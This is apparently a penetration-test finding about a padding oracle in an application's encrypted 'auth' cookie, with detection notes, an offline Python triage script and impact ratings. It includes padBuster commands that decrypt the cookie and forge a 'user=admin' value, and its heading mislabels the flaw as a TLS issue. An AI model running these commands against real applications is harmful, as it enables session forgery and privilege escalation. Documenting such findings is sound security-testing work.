V6 - Cryptography
Weak TLS configuration - Padding Oracle
POC
Detection: If you create an account and log in twice with it, you can see that the cookie sent by the application does not change. There is probably a padding oracle vulnerability here.
Exploitation: Use: padBuster.pl URL EncryptedSample BlockSize [options]
/usr/bin/perl padBuster.pl URL u7bvLewln6NMqlB%2BCRVlL%2FFMi3ZPEyUV 8 -cookies auth=u7bvLewln6NMqlB%2BCRVlL%2FFMi3ZPEyUV
/usr/bin/perl padBuster.pl URL u7bvLewln6NMqlB%2BCRVlL%2FFMi3ZPEyUV 8 -cookies auth=u7bvLewln6NMqlB%2BCRVlL%2FFMi3ZPEyUV -plaintext user=admin
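The Detection step and the BlockSize value of 8 can be checked offline from captured cookies. The following is an added example, not part of the original finding or of PadBuster; the function names are hypothetical, and the second login is assumed to return the same value as the cookie shown above.

```python
import base64
from urllib.parse import unquote

# Cookie value copied from the commands above.
PAGE_COOKIE = "u7bvLewln6NMqlB%2BCRVlL%2FFMi3ZPEyUV"


def decode_cookie(value):
    """URL-decode, then base64-decode a cookie value. Returns bytes or None."""
    raw = unquote(value)              # %2B -> '+', %2F -> '/'
    raw += "=" * (-len(raw) % 4)      # restore base64 padding if it was stripped
    try:
        return base64.b64decode(raw, validate=True)
    except ValueError:                # binascii.Error is a ValueError subclass
        return None


def triage_cookies(samples, block_sizes=(8, 16)):
    """Summarise cookies captured from repeated logins of one account."""
    decoded = [decode_cookie(s) for s in samples]
    if not decoded or any(d is None for d in decoded):
        return {"decodable": False}
    lengths = sorted({len(d) for d in decoded})
    # Block sizes that evenly divide every observed ciphertext length.
    candidates = [b for b in block_sizes
                  if all(n and n % b == 0 for n in lengths)]
    # Same account, separate logins, byte-identical cookie.
    deterministic = len(decoded) > 1 and len(set(decoded)) == 1
    return {
        "decodable": True,
        "lengths": lengths,
        "candidate_block_sizes": candidates,
        "deterministic": deterministic,
        # Heuristic flag only: matches the Detection step, proves nothing alone.
        "needs_review": deterministic and bool(candidates),
    }


if __name__ == "__main__":
    # Two logins of the same account, as in the Detection step.
    print(triage_cookies([PAGE_COOKIE, PAGE_COOKIE]))
```

The sample cookie decodes to 24 bytes, which is three 8-byte blocks and not a multiple of 16, consistent with the 8 passed as BlockSize.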
Impact
Low-Medium (depends on the information disclosure)
Likelihood
Low-Medium